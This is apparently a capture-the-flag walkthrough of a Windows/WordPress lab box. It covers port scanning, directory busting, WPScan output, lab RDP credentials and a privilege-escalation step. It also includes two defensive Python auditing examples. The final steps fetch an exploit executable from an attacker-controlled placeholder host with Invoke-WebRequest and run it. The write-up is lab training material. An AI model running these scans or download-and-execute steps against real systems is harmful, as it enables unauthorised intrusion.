Retro
New high score!
Scanning
Nmap
nmap -F 10.10.163.171
​
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 15:34 BST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.00% done; ETC: 15:35 (0:00:19 remaining)
Nmap scan report for ip-10-10-163-171.eu-west-1.compute.internal (10.10.163.171)
Host is up (0.00061s latency).
Not shown: 98 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
MAC Address: 02:80:9E:E4:33:A3 (Unknown)
​
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
HTTP and RDP are running.
Recon
Port 80
Directory busting
gobuster dir -u http://10.10.2.49/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.2.49/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/09/26 16:47:14 Starting gobuster
===============================================================
/retro (Status: 301)
===============================================================
2021/09/26 16:47:18 Finished
===============================================================
Nikto
nikto -host http://10.10.163.171/retro/
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.10.163.171
+ Target Hostname: ip-10-10-163-171.eu-west-1.compute.internal
+ Target Port: 80
+ Start Time: 2021-09-26 15:28:33 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'link' found, with contents: <http://localhost/retro/index.php/wp-json/>; rel="https://api.w.org/"
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
​
WPScan
wpscan --url http://10.10.163.171/retro/
​
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
​
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://10.10.163.171/retro/ [10.10.163.171]
[+] Started: Sun Sep 26 15:30:07 2021
​
Interesting Finding(s):
​
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
​
[+] XML-RPC seems to be enabled: http://10.10.163.171/retro/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
​
[+] WordPress readme found: http://10.10.163.171/retro/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
​
[+] The external WP-Cron seems to be enabled: http://10.10.163.171/retro/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
​
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.163.171/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
| - http://10.10.163.171/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
​
[+] WordPress theme in use: 90s-retro
| Location: http://10.10.163.171/retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.163.171/retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.163.171/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.163.171/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
​
[+] Enumerating All Plugins (via Passive Methods)
​
[i] No plugins Found.
​
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <======================================================================================================================================> (22 / 22) 100.00% Time: 00:00:00
​
[i] No Config Backups Found.
​
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
​
[+] Finished: Sun Sep 26 15:30:20 2021
[+] Requests Done: 51
[+] Cached Requests: 5
[+] Data Sent: 11.638 KB
[+] Data Received: 175.524 KB
[+] Memory used: 220.398 MB
[+] Elapsed time: 00:00:12
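The Nikto and WPScan output above is mostly passive fingerprinting: version strings in response headers, a missing anti-clickjacking header, WordPress stamping its version in the RSS generator tag, and a few well-known files answering to direct access. The script below is an added example (not code from the write-up or from either tool) that reproduces those checks over constructed sample data, so it runs offline; the header values, feed snippet and status codes are hand-written to mirror the findings above, and the function names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample data modelled on the Nikto/WPScan findings above.
# Values are hand-written for this example, not captured from a live host.
SAMPLE_HEADERS = {
    "Server": "Microsoft-IIS/10.0",
    "X-Powered-By": "PHP/7.1.29",
    "Link": '<http://localhost/retro/index.php/wp-json/>; rel="https://api.w.org/"',
    "X-Redirect-By": "WordPress",
}

# Constructed RSS feed fragment: WordPress writes its version into <generator>.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel>
  <title>Retro</title>
  <generator>https://wordpress.org/?v=5.2.1</generator>
</channel></rss>"""

# Constructed status codes for the paths WPScan probes by direct access.
SAMPLE_STATUS = {
    "/retro/xmlrpc.php": 200,
    "/retro/readme.html": 200,
    "/retro/wp-cron.php": 200,
}


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Flag headers that disclose the stack and hardening headers that are absent."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    for name in ("server", "x-powered-by"):
        if name in h:
            findings.append(f"version disclosure: {name}: {h[name]}")
    if "x-frame-options" not in h:
        findings.append("missing anti-clickjacking header (X-Frame-Options or CSP frame-ancestors)")
    if "api.w.org" in h.get("link", "") or h.get("x-redirect-by", "").lower() == "wordpress":
        findings.append("application fingerprint: WordPress (Link rel=api.w.org / X-Redirect-By)")
    return findings


GENERATOR_RE = re.compile(r"<generator>\s*https?://wordpress\.org/\?v=([\d.]+)\s*</generator>")


def wp_version_from_feed(feed_xml: str) -> Optional[str]:
    """Passive version detection, the same source WPScan used ('Rss Generator')."""
    m = GENERATOR_RE.search(feed_xml)
    return m.group(1) if m else None


def audit_exposed_files(status_by_path: Dict[str, int]) -> List[str]:
    """Direct-access checks: endpoints a hardened install would block or remove."""
    meaning = {
        "xmlrpc.php": "XML-RPC enabled (login amplification, pingback abuse)",
        "readme.html": "readme exposed (confirms WordPress, may hint at version)",
        "wp-cron.php": "external WP-Cron reachable (resource exhaustion)",
    }
    findings = []
    for path, code in status_by_path.items():
        leaf = path.rsplit("/", 1)[-1]
        if code == 200 and leaf in meaning:
            findings.append(f"{path}: {meaning[leaf]}")
    return findings


def audit_site(headers: Dict[str, str], feed_xml: str,
               status_by_path: Dict[str, int]) -> Dict[str, object]:
    """Combine the three passive/direct checks into one report dictionary."""
    return {
        "headers": audit_headers(headers),
        "wp_version": wp_version_from_feed(feed_xml),
        "exposed": audit_exposed_files(status_by_path),
    }


if __name__ == "__main__":
    for key, value in audit_site(SAMPLE_HEADERS, SAMPLE_FEED, SAMPLE_STATUS).items():
        print(key, "->", value)
```

Each finding maps to a fix on the defending side: strip Server/X-Powered-By at IIS, add X-Frame-Options or a CSP frame-ancestors directive, remove readme.html, and block xmlrpc.php and wp-cron.php unless something needs them.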
Check the /retro directory.
After some enum I found this path.
Credentials: wade:parzival
Initial Access
RDP connection (port 3389) with the credentials above.
Privilege Escalation
Check the build number using systeminfo.
This exploit works here.
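Reading the build number and installed hotfixes out of `systeminfo` is what decides whether a given kernel or service bug still applies. The parser below is an added example (not from the write-up) that extracts the OS name, build and KB list from a constructed `systeminfo` sample; the host name, build and KB numbers in the sample are placeholders, not values from the target, and the function names are my own.

```python
import re
from typing import Dict

# Constructed sample of `systeminfo` output. Host name, build and KB numbers
# are placeholders for this example, not values taken from the target.
SAMPLE_SYSTEMINFO = """
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
                           [03]: KB0000003
Network Card(s):           1 NIC(s) Installed.
"""

# "Key:   value" lines; the key may contain parentheses, e.g. "Hotfix(s)".
FIELD_RE = re.compile(r"^([A-Za-z0-9() ]+?):\s+(.*)$")
BUILD_RE = re.compile(r"Build\s+(\d+)")
# Hotfix entries are indented continuation lines: "[01]: KB1234567".
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Return OS name, numeric build and installed hotfix list from systeminfo output."""
    info: Dict[str, object] = {"os_name": None, "build": None, "hotfixes": []}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "OS Name":
                info["os_name"] = value
            elif key == "OS Version":
                b = BUILD_RE.search(value)
                info["build"] = int(b.group(1)) if b else None
            continue  # other top-level fields are not needed here
        kb = KB_RE.search(line)
        if kb:
            info["hotfixes"].append(kb.group(1).upper())
    return info


def has_hotfix(info: Dict[str, object], kb: str) -> bool:
    """True if the given KB (case-insensitive) is in the parsed hotfix list."""
    return kb.upper() in info["hotfixes"]


def build_below(info: Dict[str, object], fixed_build: int) -> bool:
    """True if the parsed build is older than the build in which a fix shipped."""
    return info["build"] is not None and info["build"] < fixed_build


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed["os_name"], "build", parsed["build"])
    print("hotfixes:", ", ".join(parsed["hotfixes"]))
```

On a real host, feed it the saved output (`systeminfo > sysinfo.txt`) and compare the build and KB list against the vendor advisory for the bug in question; both the fixed build and the KB are read from the advisory, not guessed.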
Steps
Download the zip file.
Extract it.
Set up an HTTP server on the attacking machine:
python -m http.server
On the target, fetch the executable (the -urlcache -f switches belong to certutil, not Invoke-WebRequest, so they are dropped here):
Invoke-WebRequest -Uri http://[your_ip]/[path_to_executable] -OutFile [executable_name]
Run it.